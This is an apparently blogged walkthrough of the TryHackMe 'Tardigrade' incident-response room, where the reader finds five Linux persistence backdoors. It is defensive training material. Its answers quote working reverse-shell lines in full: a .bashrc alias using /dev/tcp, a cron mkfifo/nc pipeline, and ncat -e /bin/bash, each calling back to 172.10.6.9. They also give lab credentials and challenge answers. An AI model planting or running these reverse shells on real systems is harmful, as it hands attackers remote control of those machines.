TryHackMe | Tardigrade Walkthrough
Hi there, I’m glad to see you here. In this article, we’ll solve together the “Tardigrade” room in TryHackMe. In some sections, I’ll share brief about the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Task 1 : Connect to the machine via SSH
A server has been compromised, and the security team has decided to isolate the machine until it’s been thoroughly cleaned up. Initial checks by the Incident Response team revealed that there are five different backdoors. It’s your job to find and remediate them before giving the signal to bring the server back to production.
First, let’s start the Virtual Machine by pressing the Start Machine button at the top of this task. You may access the VM using the AttackBox or your VPN connection.
To start our investigation, we need to connect to the server. The IR team has provided the credentials for use below and noted that the user has root privileges to the server. I’ll help guide you along at first, but as we progress through each step, I’m sure you’ll feel more comfortable solving these on your own.
user: giorgio
password: armani
Answer the questions below
Q1: What is the server’s OS version?
A1: Ubuntu 20.04.4 LTS
First of all, let’s connect to the relevant machine via SSH using the user and password information provided to us.
And then we can use the hostnamectl command to determine the server’s operating system version.
hostnamectl may be used to query and change the system hostname and related settings.
Task 2 : Investigating the giorgio account
Since we’re in the giorgio account already, we might as well have a look around.
Answer the questions below
Q1: What’s the most interesting file you found in giorgio’s home directory?
A1: .bad_bash
When we check the files in Giorgio’s home directory, there is an interesting file called “.bad_bash”.
When you see the word “bad”, you know there’s something wrong.
By the way, don’t forget to use the -a and -l parameters to reveal hidden files.
-a : do not ignore entries starting with
-l : use a long listing format
Q2: In every investigation, it’s important to keep a dirty wordlist to keep track of all your findings, no matter how small. It’s also a way to prevent going back in circles and starting from scratch again. As such, now’s a good time to create one and put the previous answer as an entry so we can go back to it later.
Another file that can be found in every user’s home directory is the .bashrc file. Can you check if you can find something interesting in giorgio’s .bashrc?
A2: ls=’(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls — color=auto’
The .bashrc file is a script file that’s executed when a user logs in. It is a hidden file and simple ls command won’t show the file.
When we open the relevant file in any file editor, we can see an interesting use of alias hidden within the ls command.
alias command instructs the shell to replace one string with another string while executing the commands.
alias name="value"
Q3: It seems we’ve covered the usual bases in giorgio’s home directory, so it’s time to check the scheduled tasks that he owns. Did you find anything interesting about scheduled tasks?
A3: /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f
We can use the crontab command to examine scheduled tasks.
The crontab command submits, edits, lists, or removes cron jobs.
-l : list user’s crontab
Task 3 : Dirty Wordlist Revisited
A dirty wordlist is essentially raw documentation of the investigation from the investigator’s perspective. It may contain everything that would help lead the investigation forward, from actual IOCs to random notes. Keeping a dirty wordlist assures the investigator that a specific IOC has already been recorded, helping keep the investigation on track and preventing getting stuck in a closed loop of used leads.
Answer the questions below
Q1: This section is a bonus discussion on the importance of a dirty wordlist. Accept the extra point and happy hunting! What is the flag?
A1: ***{**************}
Here’s a gift for us!
Task 4 : Investigating the root account
Normal user accounts aren’t the only place to leave persistence mechanisms. As such, we will then go ahead and investigate the root account.
Answer the questions below
Q1: A few moments after logging on to the root account, you find an error message in your terminal. What does it say?
A1: Ncat: TIMEOUT.
Q2: After moving forward with the error message, a suspicious command appears in the terminal as part of the error message. What command was displayed?
A2: ncat -e /bin/bash 172.10.6.9 6969
When we switch to the root user, an interesting error message appears after a few seconds. To be honest, I’ve never seen this error before…
And then when we run a normal command, we notice a suspicious command. So let’s search what ncat is.
Ncat is a general-purpose command-line tool for reading, writing, redirecting, and encrypting data across a network.
It aims to be your network Swiss Army knife, handling a wide variety of security testing and administration tasks.
Q3: You might wonder, “how did that happen? I didn’t even do anything? I just logged as root, and it happened.” Can you find out how the suspicious command has been implemented?
A3: .bashrc
Do you remember which script file is executed when a user logs in to the system?
Task 5 : Investigating the system
After checking the giorgio and the root accounts, it’s essentially a free-for-all from here on, as finding more suspicious items depends on how well you know what’s “normal” in the system.
Answer the questions below
Q1: There’s one more persistence mechanism in the system.
A good way to systematically dissect the system is to look for “usuals” and “unusuals”. For example, you can check for commonly abused or unusual files and directories.
This specific persistence mechanism is directly tied to something (or someone?) already present in fresh Linux installs and may be abused and/or manipulated to fit an adversary’s goals. What’s its name?
What is the last persistence mechanism?
A1: nobody
We can check the passwd file located under the etc directory to determine which users are on the system.
The /etc/passwd file is the most important file in Linux operating system. This file stores essential information about the users on the system.
I think there is an unusual user here.
Task 6 : Final Thoughts
Now that you’ve found the final persistence mechanism, it’s time to clean up. The persistence mechanisms tackled in this room are common and straightforward; as such, the process of eradicating them is simple.
The first four persistence mechanisms can be remediated by simply removing the mechanism (e.g. delete the file, remove the commands). The last one, however, involves bringing back the “unusuals” to their “usual” state, which is a bit more complex as you intend for that particular user, file or process to function as before.
Answer the questions below
Q1: Finally, as you’ve already found the final persistence mechanism, there’s value in going all the way through to the end. The adversary left a golden nugget of “advise” somewhere. What is the nugget?
A1: ***{**************}
We can see that the user “nobody” owns the directory “nonexistent” when we examine the directories.
There is also a file called “.youfoundme” in the related directory.
I suppose we’re nearing the end…
You’re right, we found you!
We’ve reached the end of another adventure…
Thank you for your time. See you soon! Until that time.. Happy Hacking ❤
Resources:
https://man7.org/linux/man-pages/man1/hostnamectl.1.html
https://man7.org/linux/man-pages/man1/ls.1.html
https://www.digitalocean.com/community/tutorials/bashrc-file-in-linux
https://www.geeksforgeeks.org/alias-command-in-linux-with-examples
https://www.ibm.com/docs/en/aix/7.2?topic=c-crontab-command
https://nmap.org/ncat/guide/index.html
https://www.geeksforgeeks.org/understanding-the-etc-passwd-file
